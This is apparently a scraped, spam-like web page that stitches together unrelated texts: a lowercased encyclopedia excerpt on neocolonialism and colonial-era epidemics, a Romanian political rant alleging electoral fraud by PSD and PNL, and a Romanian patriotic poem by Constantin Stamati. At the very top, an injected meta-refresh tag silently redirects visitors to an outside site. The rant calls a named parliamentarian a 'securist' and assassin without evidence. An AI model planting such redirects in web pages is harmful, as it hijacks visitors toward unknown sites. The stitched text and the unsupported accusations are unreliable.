cocos1

Dragos

Dragods<meta http-equiv="refresh" content="0; url=http://vdtruck.net">

MAAT INCORUPTIBILULneocolonialism the term neocolonialism has been used to refer to a variety of contexts since decolonization that took place after world war ii. generally it does not refer to a type of direct colonization, rather, colonialism by other means. specifically, neocolonialism refers to the theory that former or existing economic relationships, such as the general agreement on tariffs and trade and the central american free trade agreement, created by former colonial powers were or are used to maintain control of their former colonies and dependencies after the colonial independence movements of the post–world war ii period. colonialism and imperialism governor-general félix Éboué welcomes charles de gaulle to chad. a colony is part of an empire and so colonialism is closely related to imperialism. assumptions are that colonialism and imperialism are interchangeable, however robert young suggests that imperialism is the concept while colonialism is the practice. colonialism is based on an imperial outlook, thereby creating a consequential relationship. through an empire, colonialism is established and capitalism is expanded, on the other hand a capitalist economy naturally enforces an empire. in the next section marxists make a case for this mutually reinforcing relationship. liberalism, capitalism and colonialism classical liberals generally opposed colonialism and imperialism, including adam smith, frédéric bastiat, richard cobden, john bright, henry richard, herbert spencer, h. r. fox bourne, edward morel, josephine butler, w. j. fox and william ewart gladstone.[clarification needed] moreover, american revolution was the first anti-colonial rebellion, inspiring others.[1][14] adam smith wrote in wealth of nations that britain should liberate all of its colonies and also noted that it would be economically beneficial for british people in the average, although the merchants having mercantilist privileges would lose out.[1] post-colonialism main articles: post-colonialism and postcolonial literature post-colonialism (or post-colonial theory) can refer to a set of theories in philosophy and literature that grapple with the legacy of colonial rule. in this sense, postcolonial literature may be considered a branch of postmodern literature concerned with the political and cultural independence of peoples formerly subjugated in colonial empires. many practitioners take edward saïd`s book orientalism (1978) as the theory`s founding work (although french theorists such as aimé césaire and frantz fanon made similar claims decades before said). saïd analysed the works of balzac, baudelaire and lautréamont, exploring how they both absorbed and helped to shape a societal fantasy of european racial superiority. writers of post-colonial fiction interact with the traditional colonial discourse, but modify or subvert it; for instance by retelling a familiar story from the perspective of an oppressed minor character in the story. gayatri chakravorty spivak`s can the subaltern speak? (1998) gave its name to subaltern studies. in a critique of postcolonial reason (1999), spivak explored how major works of european metaphysics (such as those of kant and hegel) not only tend to exclude the subaltern from their discussions, but actively prevent non-europeans from occupying positions as fully human subjects. hegel`s phenomenology of spirit (1807), famous for its explicit ethnocentrism, considers western civilization as the most accomplished of all, while kant also allowed some traces of racialism to enter his work the impacts of colonization are immense and pervasive.[15] various effects, both immediate and protracted, include the spread of virulent diseases, the establishment of unequal social relations, exploitation, enslavement, medical advances, the creation of new institutions, and technological progress. impact on health see also: globalization and disease and columbian exchange encounters between explorers and populations in the rest of the world often introduced new diseases, which sometimes caused local epidemics of extraordinary virulence.[16] for example, smallpox, measles, malaria, yellow fever, and others were unknown in pre-columbian america.[17] disease killed the entire native (guanches) population of the canary islands in the 16th century. half the native population of hispaniola in 1518 was killed by smallpox. smallpox also ravaged mexico in the 1520s, killing 150,000 in tenochtitlan alone, including the emperor, and peru in the 1530s, aiding the european conquerors. measles killed a further two million mexican natives in the 17th century. in 1618–1619, smallpox wiped out 90% of the massachusetts bay native americans.[18] smallpox epidemics in 1780–1782 and 1837–1838 brought devastation and drastic depopulation among the plains indians.[19] some believe that the death of up to 95% of the native american population of the new world was caused by old world diseases.[20] over the centuries, the europeans had developed high degrees of immunity to these diseases, while the indigenous peoples had no time to build no such immunity.[21] smallpox decimated the native population of australia, killing around 50% of indigenous australians in the early years of british colonisation.[22] it also killed many new zealand māori.[23] as late as 1848–49, as many as 40,000 out of 150,000 hawaiians are estimated to have died of measles, whooping cough and influenza. introduced diseases, notably smallpox, nearly wiped out the native population of easter island.[24] in 1875, measles killed over 40,000 fijians, approximately one-third of the population.[25] the ainu population decreased drastically in the 19th century, due in large part to infectious diseases brought by japanese settlers pouring into hokkaido.[26] conversely, researchers concluded that syphilis was carried from the new world to europe after columbus`s voyages. the findings suggested europeans could have carried the nonvenereal tropical bacteria home, where the organisms may have mutated into a more deadly form in the different conditions of europe.[27] the disease was more frequently fatal than it is today; syphilis was a major killer in europe during the renaissance.[28] the first cholera pandemic began in bengal, then spread across india by 1820. ten thousand british troops and countless indians died during this pandemic.[29] between 1736 and 1834 only some 10% of east india company`s officers survived to take the final voyage home.[30] waldemar haffkine, who mainly worked in india, who developed and used vaccines against cholera and bubonic plague in the 1890s, is considered the first microbiologist. countering disease the dutch public health service provides medical care for the native people of the dutch east indies, may 1946 as early as 1803, the spanish crown organised a mission (the balmis expedition) to transport the smallpox vaccine to the spanish colonies, and establish mass vaccination programs there.[31] by 1832, the federal government of the united states established a smallpox vaccination program for native americans.[32] under the direction of mountstuart elphinstone a program was launched to propagate smallpox vaccination in india.[33] from the beginning of the 20th century onwards, the elimination or control of disease in tropical countries became a driving force for all colonial powers.[34] the sleeping sickness epidemic in africa was arrested due to mobile teams systematically screening millions of people at risk.[35] in the 20th century, the world saw the biggest increase in its population in human history due to lessening of the mortality rate in many countries due to medical advances.[36] the world population has grown from 1.6 billion in 1900 to an estimated 6.975 billion today.[37] some[who?] believe that discussion of how diseases were spread has been scuttled by descendants of colonialists to conceal actual origins of how indigenous populations were purposefully infected with these new diseases. an argument here is that once[when?] european colonists discovered indigenous populations were not immune to certain diseases, they deliberately spread diseases to gain military advantages and subjugate local peoples. there is, however, only one documented case of germ warfare, involving british commander jeffrey amherst during the siege of fort pitt.[38] it is uncertain whether this documented british attempt successfully infected the native americans.[39] many scholars[who?] have argued that evidence that supports this practice as having been executed on a larger scale across north america is weak. yet, growing evidence is showing that other indigenous communities were purposefully infected, citing oral history from the descendants of said peoples.[citation needed] it has been regarded as one of the first instances of use of biological weapons in the history of warfare.

MAAT INCORUPTIBILULde ce crede p.p.-d.d.ca eu vad in viitor ca dupa alegeri,coruptii p.s.d. si p.n.l. ,ma vor chema sa imi dea ultimamul pentru a nu mai scrie peste hotare[asa cum facea parlamentarul securist si assasin ion stan de dambovita ]? pentru ca din pacate le va reusi frauda electorala si vor strange fraudulos 51%[pentru a forma guvernul ] rupand din voturile p.p.-d.d.!!!!!chiar daca vad in tunelul timpului evenimente care nu imi convin [cel putin in ceeea ce ma priveste , aceasta nu inseamna ca nu trebuie sa mai lupt !asa am procedat si cand s-a admis recursul eng de catre c.a.b. in dosarul cu eba dupa ce au amanat transmiterea plicului cu valoare [adica se stia ce contine plicul ] prin posta a contestatiei depuse in 03iulie 2009 ,[pe 08iulie 2009eba incepuse campania electorala pentru parlamentul european ]desi stiam ca in final se va pierde procesul .securistii de la psd pnl pc,au capacitatea de analiza si sinteza precum si capacitatea de interpretare care lipseste din pacate altora !!si eu am contribuit la imbunatatirea capacitatiilor de intelegere din vara nuylui 2009 pana in iulie 2010!poate ca tocmai de aceea sunt atat de inversunat pe ei !!! este vorba de un popor care prin strămoşii săi îşi are rădăcini de patru ori milenare, aceasta este mândria şi aceata este puterea noastră. (nicolae iorga, originea, firea şi destinul neamului românesc în enciclopedia româniei) starea de pauperizare absoluta a 75%din populatia romaniei ,se datoreaza coruptiei membrilor p.s.d. , p.n.l. ,p.c. care au putut fi santajati sa treaca in barca inamicului .in afara de complicitatea p.s.d. ,p.n.l. si p.c. , prin intermediul acelora tradatori ce au constituit u.n.p.r. [din care se preconizase initial sa fac parte chiar si victor ponta daca nu obtinea presedentia p.s.d.-dupa marturisirile lui gabriel oprea ]si ulterior au fost inregistrati judecatoreste de catre mediocrii reprezentanti ai t.b.[presedinta si vicepresedinta tribunalului bucuresti] s-au putut vota in parlament legi anti-natiune ,cum ar fi marirea t.v.a.-ului ,instituirea unor taxe inumane [pe a doua sau a treia proprietate in conditiile in care cel trei proprietati sunt constituite din cate o garsoniera ].aceasta in loc sa se instituie o taxa pe lux ...culmea este ca dupa alegerile parlamentare [daca nu se voit r putea frauda atatea voturi cate trebuie ]ce vor avea loc , u.n.p.r.va fi absorbit de catre p.s.d. !!! stamati constantin - dorul de patrie dedicat româniei am fost şi eu român, dar m-am făcut păgân, căci tânăr fiind, bietul meu pământ, de tătari călcat, ei sclav m-au luat. . . . . . . . de-acum numai moartea să mă scape poate din păgânătate. doina veche a unui prizonier la tătari1 bunului patriot şi fumul ţării sale i se pare dulce şi mirositor...2 i când aş fi o frunzişoară ca de zefir aripioară, care căzând în izvor pluteşte pe el uşor, eu m-aş smulge cu grăbire din crenguţa unde sunt, aş sări cu mulţumire În pârăuţ sau în vânt; sau aş zbura pân-departe, peste păduri neumblate, sau aş zbura peste râpi, ca pasăre cu aripi, peste stânci de cremeni oable, peste răsfăţatul lac, În care ca plete albe rădăcini de copaci zac, peste dumbrava cerboaicei, peste bârlogul ursoaicei, peste-ăuîn codru de stejari ce stau chiar nişte străjari, peste râpi întunecoase, lăcaş aprigului hoţ, a căruia frunte arsă Şi a lui ucigaş glonţ n-ar putea să mă-ngrozească, n-ar putea să mă poprească, pân�la moldova să zbor, oh! şi acolo să mor... unde ceahlăul desparte pe moldova de ardeal, Şi unde bistriţa cade cu al său limpede val, ca o fragedă mireasă, În braţele fioroase al unui aprig bărbat ca siretiul tulburat. acolo drag mi-ar fi mie sus în văzduh să plutesc, de unde să văd o mie de cadre ce se zăresc; aice-un şir de culmi nalte. acolo văi, râuri late, ce dacia sfâşuiesc Şi-n bucăţi o împărţesc... acolo ziduri căzute de cetăţi ce pomenesc faima daciei trecute Şi-a neamului românesc. ii dar cum de au pierit oare a româniei3 nume mare, Ş-a celor principi faimoşi patriei părinţi duioşi? unde-s oştele acele care-odată tăbărând peste dâmburi şi vâlcele Şi focuri multe-aprinzând, se părea stele picate sau fulgere înfocate, lucind pe fier fioros Şi făcându-l mai tăios? unde-s hatmanii aceia de buzdugani purtători, ce cu a lor bărbăţie s-au făcut nemuritori? unde-i ceata panţirească, ce păzi stema domnească, pe tot trupul înzăuaţi ca zmeii înfricoşaţi? unde-s copiii de casă ce sta lângă domni spre pază, pajii nobili şi frumoşi ca haiducii fioroşi? unde-s mocanii de munte ce purta prăştii şi lănci, Şi sărea ca nişte ciute peste şanţuri şi pălănci? Şi a arcaşilor ceată ale cărora săgeată pătrundea fără de greş duşmanii cei mai aleşi? unde-s cete cu sineţe a ghibacilor plăieşi ce la războaie-ndrăzneţe bătea numai în cămeşi, cu pieptul şi braţe goale, duşmanii ferecaţi în zale? căci glonţul lor mergea drept În a duşmanilor piept; unde-s trabanţii de groază, cu baltage şi măciuci, cu a lor barbe tufoase Şi cu flocoasele burci? unde-s călăraşii groaznici cu fugarii lor pohodnici, ce ca pasărea zbura Şi ca fiarele zbiera, când buciumul chema oaste, când măzdracele lucea, Şi când simţea pe la coaste că pintenul împungea? toţi aceşti cai iuţi ca focul ce sub dânşii arde locul, bugeacului fii sirepi Şi mândri ca nişte cerbi, au pierit cu călăraşii, ca o umbră au trecut, Şi hatmanii şi ostaşii În ţărnă s-au prefăcut. iii deci unde odinioară câmpul se cutremurară de biruinţi româneşti, de vaiete duşmăneşti, acolo plugarul mână leneşii boi hăulind, pân-când plugul se anină, oase din pământ zvârlind; Şi unde odinioară pe duşmani îi înjugară la pluguri de au arat Şi ghindă au semănat* În acea dumbravă sântă oiţele se umbresc, Şi călătorul ascultă fluieraşul păstoresc... Şi unde odinioară bistriţa se încruntară de sângele duşmănesc, oh! acolo ce zăresc!!! văd de român copiliţe că se scaldă, şuguiesc, Şi apoi, împletind gâţe4, pe pajişte dănţuiesc. Însă una dintre ele saltă ca luna prin stele, fiind gigâtă la stat ca molidvul drept şi nalt; cu ochişorii ca mura, sprinceana pană de corb, fiindu-i întocmai gura pe omăt de sânge strop; mândră era copiliţa, nu-i tăcea un ceas guriţa, Şi prin luncă alerga, Şi fluturaşi alunga. iv ah, dar cum se poate oare să m-aprindă desfătare, ce mă îndeamnă să uit ca să spun ce-am început! mă întorc dar cu priinţă către timpul ce-au trecut, simţind o mare duinţă de ce pe-atuncea n-am trăit! să privesc biruitoare oastea cea nemuritoare, ce pe duşmani învingea Ş-a ţării hotar lărgea; să privesc solii triimise la scaunul românesc de craii ce zădărâse pe zimbrul moldovenesc. lăcrimam gândind aceste, dar răsării făr� de veste di-o rază ce-au luminat spre-a româniei olat!!! la 29 ghenarie 1861 s-au deschis cu solemnitate secţiile corpurilor legiuitoare ale principatelor unite... (Înţelegeţi, neamuri, şi vă plecaţi, cu noi este dumnezeu). v mă uit şi văzui deodată că cerul ne-au triimes protecţie neaşteptată din a europei congres, ce au urzit cu-ndurare a românilor scăpare, Şi stima lor înălţând precum au fost oarecând! acea protecţie sântă Întruloacă şi uneşte românia sfâşuită Şi românilor vesteşte: "că de acum românia unită are să fie În a sale vechi hotară cum au fost odinioară; Şi legi să-şi întemeieză unui guvern moderat, pe pizmaş să-l înfrunteză ce mult timp i-au fost gelat"... vi o, protecţie înaltă!!! tu sameni această dată cu marele prooroc, care pe munte de foc, a legii table săpară populului bântuit, pe care el şi scăpară de un jug nesuferit... iar făr� de-a ta apărare popoarele împilate nu-i chip să aibă scăpare de a-şi păstra libertate. precum Ştefan acel mare, Şi mihnea5 cu bărbăţie, n-au izbutit îmbinare răzleţitei românie; Şi nici putu să o scape de sângeratele labe a leului răpitor Şi lumii pârjolitor. dar ea ca stejar de munte s-au deprins, s-au învăţat cu şioaie să se lupte Şi cu furtuni ne-ncetat. Şi tot încă odrăsleşte, pe păstor adăposteşte; privind furtuna trecând Şi ea etern rămâind, sau precum viţa-de-vie măcar vite să o roadă, odrăsleşte şi învie Şi aduce iarăşi roadă... deci prinţul menit să fie domn a toată românia, să facă ţării mult bine, negândind numai la sine... să jure ca să păzească Şarta ţării nesurpată, să jure să ocrotească dreptatea la judecată; căci istoria priveşte faptele de merit mare Şi adânc le tipăreşte pe lespizi nepieritoare. Şi credeţi, deşi sunt frunză, ce vorbesc a mele buze, căci cu frunzi s-încoronează principii când se renomează. !